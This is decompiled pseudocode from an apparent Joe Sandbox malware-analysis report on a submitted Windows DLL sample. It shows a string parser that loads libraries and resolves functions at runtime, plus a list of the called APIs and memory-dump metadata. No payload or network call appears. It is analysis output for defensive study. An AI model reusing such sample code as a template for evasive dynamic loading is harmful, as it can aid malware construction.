							if(_t215 == 1) {
								_t257 = _v16;
								if(_v40 == _t283) {
									_t257 = _t257 - 1;
								}
								 *(_t332 + 0x1014) = _t257;
							}
							L42:
							_v12 = _v12 + 2;
							_v28 = _v24;
							L59:
							if(_v32 != 0xffffffff) {
								_t321 = _v12;
								continue;
							}
							break;
						}
					}
					_t258 = _t213 - 0x23;
					if(_t258 == 0) {
						__eflags = _t321 - _v56;
						if(_t321 <= _v56) {
							L17:
							__eflags = _v44 - _t283;
							if(_v44 != _t283) {
								L43:
								_t260 = _v32 - _t283;
								__eflags = _t260;
								if(_t260 == 0) {
									_t261 = _t286;
									while(1) {
										__eflags = _t261 - 0x22;
										if(_t261 != 0x22) {
											break;
										}
										_t321 =  &(_t321[1]);
										__eflags = _v44 - _t283;
										_v12 = _t321;
										if(_v44 == _t283) {
											_v44 = 1;
											L162:
											_v28 =  &(_v28[0]);
											 *_v28 =  *_t321;
											L58:
											_t331 =  &(_t321[1]);
											__eflags = _t331;
											_v12 = _t331;
											goto L59;
										}
										_t261 =  *_t321 & 0x0000ffff;
										_v44 = _t283;
									}
									__eflags = _t261 - 0x2a;
									if(_t261 == 0x2a) {
										_v36 = 2;
										L57:
										_t321 = _v12;
										_v28 = _v24;
										_t283 = 0;
										__eflags = 0;
										goto L58;
									}
									__eflags = _t261 - 0x2d;
									if(_t261 == 0x2d) {
										L151:
										_t304 =  *_t321;
										__eflags = _t304 - 0x2d;
										if(_t304 != 0x2d) {
											L154:
											_t264 =  &(_t321[1]);
											__eflags =  *_t264 - 0x3a;
											if( *_t264 != 0x3a) {
												goto L162;
											}
											__eflags = _t304 - 0x2d;
											if(_t304 == 0x2d) {
												goto L162;
											}
											_v36 = 1;
											L157:
											_v12 = _t264;
											__eflags = _v28 - _v24;
											if(_v28 <= _v24) {
												 *_v48 = _t283;
											} else {
												 *_v28 = _t283;
												lstrcpyW(_v48, _v24);
											}
											goto L57;
										}
										_t264 =  &(_t321[1]);
										__eflags =  *_t264 - 0x3e;
										if( *_t264 != 0x3e) {
											goto L154;
										}
										_v36 = 3;
										goto L157;
									}
									__eflags = _t261 - 0x3a;
									if(_t261 != 0x3a) {
										goto L162;
									}
									goto L151;
								}
								_t269 = _t260 - 1;
								__eflags = _t269;
								if(_t269 == 0) {
									L80:
									_t305 = _t286 + 0xffffffde;
									__eflags = _t305 - 0x55;
									if(_t305 > 0x55) {
										goto L57;
									}
									switch( *((intOrPtr*)(( *(_t305 + 0x6f3d23e8) & 0x000000ff) * 4 +  &M6F3D235C))) {
										case 0:
											__ecx = _v24;
											__edi = _v12;
											while(1) {
												__edi = __edi + 1;
												__edi = __edi + 1;
												_v12 = __edi;
												__ax =  *__edi;
												__eflags = __ax - __dx;
												if(__ax != __dx) {
													goto L132;
												}
												L131:
												__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
												if( *((intOrPtr*)(__edi + 2)) != __dx) {
													L136:
													 *__ecx =  *__ecx & 0x00000000;
													__eax = E6F3D12CC(_v24);
													__ebx = __eax;
													goto L97;
												}
												L132:
												__eflags = __ax;
												if(__ax == 0) {
													goto L136;
												}
												__eflags = __ax - __dx;
												if(__ax == __dx) {
													__edi = __edi + 1;
													__edi = __edi + 1;
													__eflags = __edi;
												}
												__ax =  *__edi;
												 *__ecx =  *__edi;
												__ecx = __ecx + 1;
												__ecx = __ecx + 1;
												__edi = __edi + 1;
												__edi = __edi + 1;
												_v12 = __edi;
												__ax =  *__edi;
												__eflags = __ax - __dx;
												if(__ax != __dx) {
													goto L132;
												}
												goto L131;
											}
										case 1:
											_v8 = 1;
											goto L57;
										case 2:
											_v8 = _v8 | 0xffffffff;
											goto L57;
										case 3:
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v16 = _v16 + 1;
											goto L85;
										case 4:
											__eflags = _v20;
											if(_v20 != 0) {
												goto L57;
											}
											_v12 = _v12 - 2;
											__ebx = E6F3D12BB();
											 &_v12 = E6F3D1B86( &_v12);
											__eax = E6F3D1510(__edx, __eax, __edx, __ebx);
											goto L97;
										case 5:
											L105:
											_v20 = _v20 + 1;
											goto L57;
										case 6:
											_push(7);
											goto L123;
										case 7:
											_push(0x19);
											goto L143;
										case 8:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L107;
										case 9:
											_push(0x15);
											goto L143;
										case 0xa:
											_push(0x16);
											goto L143;
										case 0xb:
											_push(0x18);
											goto L143;
										case 0xc:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L118;
										case 0xd:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L109;
										case 0xe:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L111;
										case 0xf:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L122;
										case 0x10:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L113;
										case 0x11:
											_push(3);
											goto L123;
										case 0x12:
											_push(0x17);
											L143:
											_pop(__ebx);
											goto L98;
										case 0x13:
											__eax =  &_v12;
											__eax = E6F3D1B86( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											__eflags = __ebx - 0xb;
											if(__ebx < 0xb) {
												__ebx = __ebx + 0xa;
											}
											goto L97;
										case 0x14:
											__ebx = 0xffffffff;
											goto L98;
										case 0x15:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L116;
										case 0x16:
											__ecx = 0;
											__eflags = 0;
											goto L91;
										case 0x17:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L120;
										case 0x18:
											_t271 =  *(_t332 + 0x1014);
											__eflags = _t271 - _v16;
											if(_t271 > _v16) {
												_v16 = _t271;
											}
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v36 - 3 = _t271 - (_v36 == 3);
											if(_t271 != _v36 == 3) {
												L85:
												_v40 = 1;
											}
											goto L57;
										case 0x19:
											L107:
											__ecx = 0;
											_v8 = 2;
											__ecx = 1;
											goto L91;
										case 0x1a:
											L118:
											_push(5);
											goto L123;
										case 0x1b:
											L109:
											__ecx = 0;
											_v8 = 3;
											__ecx = 1;
											goto L91;
										case 0x1c:
											L111:
											__ecx = 0;
											__ecx = 1;
											goto L91;
										case 0x1d:
											L122:
											_push(6);
											goto L123;
										case 0x1e:
											L113:
											_push(2);
											goto L123;
										case 0x1f:
											__eax =  &_v12;
											__eax = E6F3D1B86( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											goto L97;
										case 0x20:
											L116:
											_v52 = _v52 + 1;
											_push(4);
											_pop(__ecx);
											goto L91;
										case 0x21:
											L120:
											_push(4);
											L123:
											_pop(__ecx);
											L91:
											__edi = _v16;
											__edx =  *(0x6f3d405c + __ecx * 4);
											__eax =  ~__eax;
											asm("sbb eax, eax");
											_v40 = 1;
											__edi = _v16 << 5;
											__eax = __eax & 0x00008000;
											__edi = (_v16 << 5) + __esi;
											__eax = __eax | __ecx;
											__eflags = _v8;
											 *(__edi + 0x1018) = __eax;
											if(_v8 < 0) {
												L93:
												__edx = 0;
												__edx = 1;
												__eflags = 1;
												L94:
												__eflags = _v8 - 1;
												 *(__edi + 0x1028) = __edx;
												if(_v8 == 1) {
													__eax =  &_v12;
													__eax = E6F3D1B86( &_v12);
													__eax = __eax + 1;
													__eflags = __eax;
													_v8 = __eax;
												}
												__eax = _v8;
												 *((intOrPtr*)(__edi + 0x101c)) = _v8;
												_t136 = _v16 + 0x81; // 0x81
												_t136 = _t136 << 5;
												__eax = 0;
												__eflags = 0;
												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
												 *((intOrPtr*)(__edi + 0x1030)) = 0;
												 *((intOrPtr*)(__edi + 0x102c)) = 0;
												L97:
												__eflags = __ebx;
												if(__ebx == 0) {
													goto L57;
												}
												L98:
												__eflags = _v20;
												_v40 = 1;
												if(_v20 != 0) {
													L103:
													__eflags = _v20 - 1;
													if(_v20 == 1) {
														__eax = _v16;
														__eax = _v16 << 5;
														__eflags = __eax;
														 *(__eax + __esi + 0x102c) = __ebx;
													}
													goto L105;
												}
												_v16 = _v16 << 5;
												_t144 = __esi + 0x1030; // 0x1030
												__edi = (_v16 << 5) + _t144;
												__eax =  *__edi;
												__eflags = __eax - 0xffffffff;
												if(__eax <= 0xffffffff) {
													L101:
													__eax = GlobalFree(__eax);
													L102:
													 *__edi = __ebx;
													goto L103;
												}
												__eflags = __eax - 0x19;
												if(__eax <= 0x19) {
													goto L102;
												}
												goto L101;
											}
											__eflags = __edx;
											if(__edx > 0) {
												goto L94;
											}
											goto L93;
										case 0x22:
											goto L57;
									}
								}
								_t272 = _t269 - 1;
								__eflags = _t272;
								if(_t272 == 0) {
									_v16 = _t283;
									goto L80;
								}
								__eflags = _t272 != 1;
								if(_t272 != 1) {
									goto L162;
								}
								__eflags = _t286 - 0x6e;
								if(__eflags > 0) {
									_t309 = _t286 - 0x72;
									__eflags = _t309;
									if(_t309 == 0) {
										_push(4);
										L74:
										_pop(_t274);
										L75:
										__eflags = _v8 - 1;
										if(_v8 != 1) {
											_t96 = _t332 + 0x1010;
											 *_t96 =  *(_t332 + 0x1010) &  !_t274;
											__eflags =  *_t96;
										} else {
											 *(_t332 + 0x1010) =  *(_t332 + 0x1010) | _t274;
										}
										_v8 = 1;
										goto L57;
									}
									_t312 = _t309 - 1;
									__eflags = _t312;
									if(_t312 == 0) {
										_push(0x10);
										goto L74;
									}
									__eflags = _t312 != 0;
									if(_t312 != 0) {
										goto L57;
									}
									_push(0x40);
									goto L74;
								}
								if(__eflags == 0) {
									_push(8);
									goto L74;
								}
								_t315 = _t286 - 0x21;
								__eflags = _t315;
								if(_t315 == 0) {
									_v8 =  ~_v8;
									goto L57;
								}
								_t316 = _t315 - 0x11;
								__eflags = _t316;
								if(_t316 == 0) {
									_t274 = 0x100;
									goto L75;
								}
								_t317 = _t316 - 0x31;
								__eflags = _t317;
								if(_t317 == 0) {
									_t274 = 1;
									goto L75;
								}
								__eflags = _t317 != 0;
								if(_t317 != 0) {
									goto L57;
								}
								_push(0x20);
								goto L74;
							} else {
								_v32 = _t283;
								_v36 = _t283;
								goto L20;
							}
						}
						__eflags =  *((short*)(_t321 - 2)) - 0x3a;
						if( *((short*)(_t321 - 2)) != 0x3a) {
							goto L17;
						}
						__eflags = _v32 - _t283;
						if(_v32 == _t283) {
							goto L43;
						}
						goto L17;
					}
					_t277 = _t258 - 5;
					if(_t277 == 0) {
						__eflags = _v44 - _t283;
						if(_v44 != _t283) {
							goto L43;
						} else {
							__eflags = _v36 - 3;
							_v32 = 1;
							_v8 = _t283;
							_v20 = _t283;
							_v16 = (0 | _v36 == 0x00000003) + 1;
							_v40 = _t283;
							goto L20;
						}
					}
					_t281 = _t277 - 1;
					if(_t281 == 0) {
						__eflags = _v44 - _t283;
						if(_v44 != _t283) {
							goto L43;
						} else {
							_v32 = 2;
							_v8 = _t283;
							_v20 = _t283;
							goto L20;
						}
					}
					if(_t281 != 0x16) {
						goto L43;
					} else {
						_v32 = 3;
						_v8 = 1;
						goto L20;
					}
				}
				GlobalFree(_v56);
				GlobalFree(_v24);
				GlobalFree(_v48);
				if(_t332 == _t283 ||  *(_t332 + 0x100c) != _t283) {
					L182:
					return _t332;
				} else {
					_t225 =  *_t332 - 1;
					if(_t225 == 0) {
						_t187 = _t332 + 8; // 0x8
						_t324 = _t187;
						__eflags =  *_t324 - _t283;
						if( *_t324 != _t283) {
							_t226 = GetModuleHandleW(_t324);
							__eflags = _t226 - _t283;
							 *(_t332 + 0x1008) = _t226;
							if(_t226 != _t283) {
								L171:
								_t192 = _t332 + 0x808; // 0x808
								_t325 = _t192;
								_t227 = E6F3D16BD( *(_t332 + 0x1008), _t325);
								__eflags = _t227 - _t283;
								 *(_t332 + 0x100c) = _t227;
								if(_t227 == _t283) {
									__eflags =  *_t325 - 0x23;
									if( *_t325 == 0x23) {
										_t195 = _t332 + 0x80a; // 0x80a
										_t231 = E6F3D13B1(_t195);
										__eflags = _t231 - _t283;
										if(_t231 != _t283) {
											__eflags = _t231 & 0xffff0000;
											if((_t231 & 0xffff0000) == 0) {
												 *(_t332 + 0x100c) = GetProcAddress( *(_t332 + 0x1008), _t231 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v52 - _t283;
								if(_v52 != _t283) {
									L178:
									_t325[lstrlenW(_t325)] = 0x57;
									_t229 = E6F3D16BD( *(_t332 + 0x1008), _t325);
									__eflags = _t229 - _t283;
									if(_t229 != _t283) {
										L166:
										 *(_t332 + 0x100c) = _t229;
										goto L182;
									}
									__eflags =  *(_t332 + 0x100c) - _t283;
									L180:
									if(__eflags != 0) {
										goto L182;
									}
									L181:
									_t206 = _t332 + 4;
									 *_t206 =  *(_t332 + 4) | 0xffffffff;
									__eflags =  *_t206;
									goto L182;
								} else {
									__eflags =  *(_t332 + 0x100c) - _t283;
									if( *(_t332 + 0x100c) != _t283) {
										goto L182;
									}
									goto L178;
								}
							}
							_t234 = LoadLibraryW(_t324);
							__eflags = _t234 - _t283;
							 *(_t332 + 0x1008) = _t234;
							if(_t234 == _t283) {
								goto L181;
							}
							goto L171;
						}
						_t188 = _t332 + 0x808; // 0x808
						_t236 = E6F3D13B1(_t188);
						 *(_t332 + 0x100c) = _t236;
						__eflags = _t236 - _t283;
						goto L180;
					}
					_t237 = _t225 - 1;
					if(_t237 == 0) {
						_t185 = _t332 + 0x808; // 0x808
						_t238 = _t185;
						__eflags =  *_t238 - _t283;
						if( *_t238 == _t283) {
							goto L182;
						}
						_t229 = E6F3D13B1(_t238);
						L165:
						goto L166;
					}
					if(_t237 != 1) {
						goto L182;
					}
					_t81 = _t332 + 8; // 0x8
					_t284 = _t81;
					_t326 = E6F3D13B1(_t81);
					 *(_t332 + 0x1008) = _t326;
					if(_t326 == 0) {
						goto L181;
					}
					 *(_t332 + 0x104c) =  *(_t332 + 0x104c) & 0x00000000;
					 *((intOrPtr*)(_t332 + 0x1050)) = E6F3D12CC(_t284);
					 *(_t332 + 0x103c) =  *(_t332 + 0x103c) & 0x00000000;
					 *((intOrPtr*)(_t332 + 0x1048)) = 1;
					 *((intOrPtr*)(_t332 + 0x1038)) = 1;
					_t90 = _t332 + 0x808; // 0x808
					_t229 =  *(_t326->i + E6F3D13B1(_t90) * 4);
					goto L165;
				}
			}

0x6f3d1c07
0x6f3d1c0a
0x6f3d1c0d
0x6f3d1c10
0x6f3d1c13
0x6f3d1c16
0x6f3d1c19
0x6f3d1c1b
0x6f3d1c1e
0x6f3d1c21
0x6f3d1c26
0x6f3d1c29
0x6f3d1c31
0x6f3d1c39
0x6f3d1c3b
0x6f3d1c3e
0x6f3d1c46
0x6f3d1c46
0x6f3d1c4b
0x6f3d1c4e
0x00000000
0x00000000
0x6f3d1c5b
0x6f3d1c60
0x6f3d1c62
0x6f3d1cf4
0x6f3d1cf4
0x6f3d1cf4
0x6f3d1cf8
0x6f3d1cfb
0x6f3d1cfd
0x6f3d1d1f
0x6f3d1d21
0x6f3d1d24
0x6f3d1d33
0x6f3d1d35
0x6f3d1d3b
0x6f3d1d3b
0x6f3d1d41
0x6f3d1d44
0x6f3d1d44
0x6f3d1d47
0x6f3d1d47
0x6f3d1d4d
0x6f3d1d4f
0x6f3d1d4f
0x6f3d1d51
0x6f3d1d54
0x6f3d1d57
0x6f3d1d5d
0x6f3d1d63
0x6f3d1d66
0x6f3d1d8a
0x6f3d1d8d
0x00000000
0x00000000
0x6f3d1d90
0x6f3d1d92
0x6f3d1da0
0x6f3d1da3
0x6f3d1da5
0x00000000
0x00000000
0x00000000
0x00000000
0x6f3d1da7
0x6f3d1da7
0x6f3d1da7
0x6f3d1dad
0x6f3d1daf
0x00000000
0x00000000
0x6f3d1db1
0x6f3d1db3
0x6f3d1db5
0x6f3d1db7
0x00000000
0x00000000
0x00000000
0x6f3d1db7
0x6f3d1db9
0x6f3d1dbb
0x6f3d1dbd
0x6f3d1dbd
0x6f3d1dc3
0x6f3d1dc9
0x6f3d1dcb
0x6f3d1ddf
0x6f3d1ddf
0x6f3d1de1
0x6f3d1dcd
0x6f3d1dd3
0x6f3d1dd6
0x6f3d1dd6
0x00000000
0x6f3d1d68
0x6f3d1d68
0x6f3d1d68
0x6f3d1d69
0x6f3d1d71
0x6f3d1d75
0x6f3d1d7b
0x6f3d1d7f
0x00000000
0x6f3d1d7f
0x6f3d1d6b
0x6f3d1d6b
0x6f3d1d6c
0x00000000
0x00000000
0x6f3d1d6e
0x6f3d1d6f
0x00000000
0x00000000
0x00000000
0x6f3d1d6f
0x6f3d1cff
0x6f3d1d00
0x6f3d1d09
0x6f3d1d0c
0x6f3d1d19
0x6f3d1d19
0x6f3d1d0e
0x6f3d1d0e
0x6f3d1de7
0x6f3d1dea
0x6f3d1dee
0x6f3d1e61
0x6f3d1e65
0x6f3d1c43
0x00000000
0x6f3d1c43
0x00000000
0x6f3d1e65
0x6f3d1cfd
0x6f3d1c68
0x6f3d1c6b
0x6f3d1cce
0x6f3d1cd1
0x6f3d1ce3
0x6f3d1ce3
0x6f3d1ce6
0x6f3d1df3
0x6f3d1df6
0x6f3d1df6
0x6f3d1df8
0x6f3d21ae
0x6f3d21c6
0x6f3d21c6
0x6f3d21c9
0x00000000
0x00000000
0x6f3d21b3
0x6f3d21b4
0x6f3d21b7
0x6f3d21ba
0x6f3d2244
0x6f3d224b
0x6f3d2251
0x6f3d2255
0x6f3d1e5c
0x6f3d1e5d
0x6f3d1e5d
0x6f3d1e5e
0x00000000
0x6f3d1e5e
0x6f3d21c0
0x6f3d21c3
0x6f3d21c3
0x6f3d21cb
0x6f3d21ce
0x6f3d2238
0x6f3d1e51
0x6f3d1e54
0x6f3d1e57
0x6f3d1e5a
0x6f3d1e5a
0x00000000
0x6f3d1e5a
0x6f3d21d0
0x6f3d21d3
0x6f3d21da
0x6f3d21da
0x6f3d21dd
0x6f3d21e1
0x6f3d21f5
0x6f3d21f5
0x6f3d21f8
0x6f3d21fc
0x00000000
0x00000000
0x6f3d21fe
0x6f3d2202
0x00000000
0x00000000
0x6f3d2204
0x6f3d220b
0x6f3d220b
0x6f3d2211
0x6f3d2214
0x6f3d2230
0x6f3d2216
0x6f3d221f
0x6f3d2222
0x6f3d2222
0x00000000
0x6f3d2214
0x6f3d21e3
0x6f3d21e6
0x6f3d21ea
0x00000000
0x00000000
0x6f3d21ec
0x00000000
0x6f3d21ec
0x6f3d21d5
0x6f3d21d8
0x00000000
0x00000000
0x00000000
0x6f3d21d8
0x6f3d1dfe
0x6f3d1dfe
0x6f3d1dff
0x6f3d1f49
0x6f3d1f49
0x6f3d1f50
0x6f3d1f53
0x00000000
0x00000000
0x6f3d1f60
0x00000000
0x6f3d214b
0x6f3d214e
0x6f3d2151
0x6f3d2151
0x6f3d2152
0x6f3d2153
0x6f3d2156
0x6f3d2159
0x6f3d215c
0x00000000
0x00000000
0x6f3d215e
0x6f3d215e
0x6f3d2162
0x6f3d217a
0x6f3d217d
0x6f3d2181
0x6f3d2187
0x00000000
0x6f3d2187
0x6f3d2164
0x6f3d2164
0x6f3d2167
0x00000000
0x00000000
0x6f3d2169
0x6f3d216c
0x6f3d216e
0x6f3d216f
0x6f3d216f
0x6f3d216f
0x6f3d2170
0x6f3d2173
0x6f3d2176
0x6f3d2177
0x6f3d2151
0x6f3d2152
0x6f3d2153
0x6f3d2156
0x6f3d2159
0x6f3d215c
0x00000000
0x00000000
0x00000000
0x6f3d215c
0x00000000
0x6f3d1fa7
0x00000000
0x00000000
0x6f3d1fb3
0x00000000
0x00000000
0x6f3d1f9a
0x6f3d1f9e
0x6f3d1fa2
0x00000000
0x00000000
0x6f3d211c
0x6f3d2120
0x00000000
0x00000000
0x6f3d2126
0x6f3d212f
0x6f3d2136
0x6f3d213e
0x00000000
0x00000000
0x6f3d2083
0x6f3d2083
0x00000000
0x00000000
0x6f3d1fbc
0x00000000
0x00000000
0x6f3d21a6
0x00000000
0x00000000
0x6f3d208b
0x6f3d208d
0x6f3d208d
0x00000000
0x00000000
0x6f3d2196
0x00000000
0x00000000
0x6f3d219a
0x00000000
0x00000000
0x6f3d21a2
0x00000000
0x00000000
0x6f3d20d3
0x6f3d20d5
0x6f3d20d5
0x00000000
0x00000000
0x6f3d209d
0x6f3d209f
0x6f3d209f
0x00000000
0x00000000
0x6f3d20af
0x6f3d20b1
0x6f3d20b1
0x00000000
0x00000000
0x6f3d20e1
0x6f3d20e3
0x6f3d20e3
0x00000000
0x00000000
0x6f3d20ba
0x6f3d20bc
0x6f3d20bc
0x00000000
0x00000000
0x6f3d20c1
0x00000000
0x00000000
0x6f3d219e
0x6f3d21a8
0x6f3d21a8
0x00000000
0x00000000
0x6f3d20ec
0x6f3d20f0
0x6f3d20f5
0x6f3d20f8
0x6f3d20f9
0x6f3d20fc
0x6f3d2102
0x6f3d2102
0x00000000
0x00000000
0x6f3d218e
0x00000000
0x00000000
0x6f3d20c5
0x6f3d20c7
0x6f3d20c7
0x00000000
0x00000000
0x6f3d1fc3
0x6f3d1fc3
0x00000000
0x00000000
0x6f3d20da
0x6f3d20dc
0x6f3d20dc
0x00000000
0x00000000
0x6f3d1f67
0x6f3d1f6d
0x6f3d1f70
0x6f3d1f72
0x6f3d1f72
0x6f3d1f75
0x6f3d1f79
0x6f3d1f86
0x6f3d1f88
0x6f3d1f8e
0x6f3d1f8e
0x6f3d1f8e
0x00000000
0x00000000
0x6f3d208e
0x6f3d208e
0x6f3d2090
0x6f3d2097
0x00000000
0x00000000
0x6f3d20d6
0x6f3d20d6
0x00000000
0x00000000
0x6f3d20a0
0x6f3d20a0
0x6f3d20a2
0x6f3d20a9
0x00000000
0x00000000
0x6f3d20b2
0x6f3d20b2
0x6f3d20b4
0x00000000
0x00000000
0x6f3d20e4
0x6f3d20e4
0x00000000
0x00000000
0x6f3d20bd
0x6f3d20bd
0x00000000
0x00000000
0x6f3d210a
0x6f3d210e
0x6f3d2113
0x6f3d2116
0x00000000
0x00000000
0x6f3d20c8
0x6f3d20c8
0x6f3d20cb
0x6f3d20cd
0x00000000
0x00000000
0x6f3d20dd
0x6f3d20dd
0x6f3d20e6
0x6f3d20e6
0x6f3d1fc5
0x6f3d1fc5
0x6f3d1fc8
0x6f3d1fcf
0x6f3d1fd1
0x6f3d1fd3
0x6f3d1fda
0x6f3d1fdd
0x6f3d1fe2
0x6f3d1fe4
0x6f3d1fe6
0x6f3d1fea
0x6f3d1ff0
0x6f3d1ff6
0x6f3d1ff6
0x6f3d1ff8
0x6f3d1ff8
0x6f3d1ff9
0x6f3d1ff9
0x6f3d1ffd
0x6f3d2003
0x6f3d2005
0x6f3d2009
0x6f3d200e
0x6f3d200e
0x6f3d2010
0x6f3d2010
0x6f3d2013
0x6f3d2016
0x6f3d201f
0x6f3d2025
0x6f3d2028
0x6f3d2028
0x6f3d202a
0x6f3d202d
0x6f3d2033
0x6f3d2039
0x6f3d2039
0x6f3d203b
0x00000000
0x00000000
0x6f3d2041
0x6f3d2041
0x6f3d2045
0x6f3d204c
0x6f3d2070
0x6f3d2070
0x6f3d2074
0x6f3d2076
0x6f3d2079
0x6f3d2079
0x6f3d207c
0x6f3d207c
0x00000000
0x6f3d2074
0x6f3d2051
0x6f3d2054
0x6f3d2054
0x6f3d205b
0x6f3d205d
0x6f3d2060
0x6f3d2067
0x6f3d2068
0x6f3d206e
0x6f3d206e
0x00000000
0x6f3d206e
0x6f3d2062
0x6f3d2065
0x00000000
0x00000000
0x00000000
0x6f3d2065
0x6f3d1ff2
0x6f3d1ff4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6f3d1f60
0x6f3d1e05
0x6f3d1e05
0x6f3d1e06
0x6f3d1f46
0x00000000
0x6f3d1f46
0x6f3d1e0c
0x6f3d1e0d
0x00000000
0x00000000
0x6f3d1e13
0x6f3d1e16
0x6f3d1f0b
0x6f3d1f0b
0x6f3d1f0e
0x6f3d1f23
0x6f3d1f25
0x6f3d1f25
0x6f3d1f26
0x6f3d1f29
0x6f3d1f2c
0x6f3d1f38
0x6f3d1f38
0x6f3d1f38
0x6f3d1f2e
0x6f3d1f2e
0x6f3d1f2e
0x6f3d1f3e
0x00000000
0x6f3d1f3e
0x6f3d1f10
0x6f3d1f10
0x6f3d1f11
0x6f3d1f1f
0x00000000
0x6f3d1f1f
0x6f3d1f14
0x6f3d1f15
0x00000000
0x00000000
0x6f3d1f1b
0x00000000
0x6f3d1f1b
0x6f3d1e1c
0x6f3d1f07
0x00000000
0x6f3d1f07
0x6f3d1e22
0x6f3d1e22
0x6f3d1e25
0x6f3d1e4e
0x00000000
0x6f3d1e4e
0x6f3d1e27
0x6f3d1e27
0x6f3d1e2a
0x6f3d1e44
0x00000000
0x6f3d1e44
0x6f3d1e2c
0x6f3d1e2c
0x6f3d1e2f
0x6f3d1e3e
0x00000000
0x6f3d1e3e
0x6f3d1e32
0x6f3d1e33
0x00000000
0x00000000
0x6f3d1e35
0x00000000
0x6f3d1cec
0x6f3d1cec
0x6f3d1cef
0x00000000
0x6f3d1cef
0x6f3d1ce6
0x6f3d1cd3
0x6f3d1cd8
0x00000000
0x00000000
0x6f3d1cda
0x6f3d1cdd
0x00000000
0x00000000
0x00000000
0x6f3d1cdd
0x6f3d1c6d
0x6f3d1c70
0x6f3d1ca6
0x6f3d1ca9
0x00000000
0x6f3d1caf
0x6f3d1cb1
0x6f3d1cb5
0x6f3d1cbc
0x6f3d1cc3
0x6f3d1cc6
0x6f3d1cc9
0x00000000
0x6f3d1cc9
0x6f3d1ca9
0x6f3d1c72
0x6f3d1c73
0x6f3d1c8e
0x6f3d1c91
0x00000000
0x6f3d1c97
0x6f3d1c97
0x6f3d1c9e
0x6f3d1ca1
0x00000000
0x6f3d1ca1
0x6f3d1c91
0x6f3d1c78
0x00000000
0x6f3d1c7e
0x6f3d1c7e
0x6f3d1c85
0x00000000
0x6f3d1c85
0x6f3d1c78
0x6f3d1e74
0x6f3d1e79
0x6f3d1e7e
0x6f3d1e82
0x6f3d2355
0x6f3d235b
0x6f3d1e94
0x6f3d1e96
0x6f3d1e97
0x6f3d227e
0x6f3d227e
0x6f3d2281
0x6f3d2284
0x6f3d22a1
0x6f3d22a7
0x6f3d22a9
0x6f3d22af
0x6f3d22c6
0x6f3d22c6
0x6f3d22c6
0x6f3d22d3
0x6f3d22d9
0x6f3d22dc
0x6f3d22e2
0x6f3d22e4
0x6f3d22e8
0x6f3d22ea
0x6f3d22f1
0x6f3d22f6
0x6f3d22f9
0x6f3d22fb
0x6f3d2300
0x6f3d2312
0x6f3d2312
0x6f3d2300
0x6f3d22f9
0x6f3d22e8
0x6f3d2318
0x6f3d231b
0x6f3d2325
0x6f3d232d
0x6f3d233a
0x6f3d2340
0x6f3d2343
0x6f3d2273
0x6f3d2273
0x00000000
0x6f3d2273
0x6f3d2349
0x6f3d234f
0x6f3d234f
0x00000000
0x00000000
0x6f3d2351
0x6f3d2351
0x6f3d2351
0x6f3d2351
0x00000000
0x6f3d231d
0x6f3d231d
0x6f3d2323
0x00000000
0x00000000
0x00000000
0x6f3d2323
0x6f3d231b
0x6f3d22b2
0x6f3d22b8
0x6f3d22ba
0x6f3d22c0
0x00000000
0x00000000
0x00000000
0x6f3d22c0
0x6f3d2286
0x6f3d228d
0x6f3d2293
0x6f3d2299
0x00000000
0x6f3d2299
0x6f3d1e9d
0x6f3d1e9e
0x6f3d225d
0x6f3d225d
0x6f3d2263
0x6f3d2266
0x00000000
0x00000000
0x6f3d226d
0x6f3d2272
0x00000000
0x6f3d2272
0x6f3d1ea5
0x00000000
0x00000000
0x6f3d1eab
0x6f3d1eab
0x6f3d1eb4
0x6f3d1eb9
0x6f3d1ebf
0x00000000
0x00000000
0x6f3d1ec5
0x6f3d1ed2
0x6f3d1ed8
0x6f3d1ee2
0x6f3d1ee8
0x6f3d1ef0
0x6f3d1f00
0x00000000
0x6f3d1f00

APIs

Part of subcall function 6F3D12BB: GlobalAlloc.KERNEL32(00000040,?,6F3D12DB,?,6F3D137F,00000019,6F3D11CA,-000000A0), ref: 6F3D12C5

GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 6F3D1D2D
lstrcpyW.KERNEL32(00000008,?), ref: 6F3D1D75
lstrcpyW.KERNEL32(00000808,?), ref: 6F3D1D7F
GlobalFree.KERNEL32(00000000), ref: 6F3D1D92
GlobalFree.KERNEL32(?), ref: 6F3D1E74
GlobalFree.KERNEL32(?), ref: 6F3D1E79
GlobalFree.KERNEL32(?), ref: 6F3D1E7E
GlobalFree.KERNEL32(00000000), ref: 6F3D2068
lstrcpyW.KERNEL32(?,?), ref: 6F3D2222
GetModuleHandleW.KERNEL32(00000008), ref: 6F3D22A1
LoadLibraryW.KERNEL32(00000008), ref: 6F3D22B2
GetProcAddress.KERNEL32(?,?), ref: 6F3D230C
lstrlenW.KERNEL32(00000808), ref: 6F3D2326

Memory Dump Source

Source File: 00000001.00000002.18505223638.000000006F3D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F3D0000, based on PE: true

Associated: 00000001.00000002.18505136073.000000006F3D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.18505336167.000000006F3D4000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.18505402042.000000006F3D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6f3d0000_SecuriteInfo.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
String ID:
API String ID: 245916457-0
Opcode ID: a0c8a671d48bcbc9b982f4f52ccb9d7b91d52e55e53b556bf331d52aa051ef9e
